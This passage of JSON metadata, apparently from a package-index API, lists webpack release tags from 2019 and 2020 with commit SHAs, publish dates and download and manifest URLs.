ebpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"pu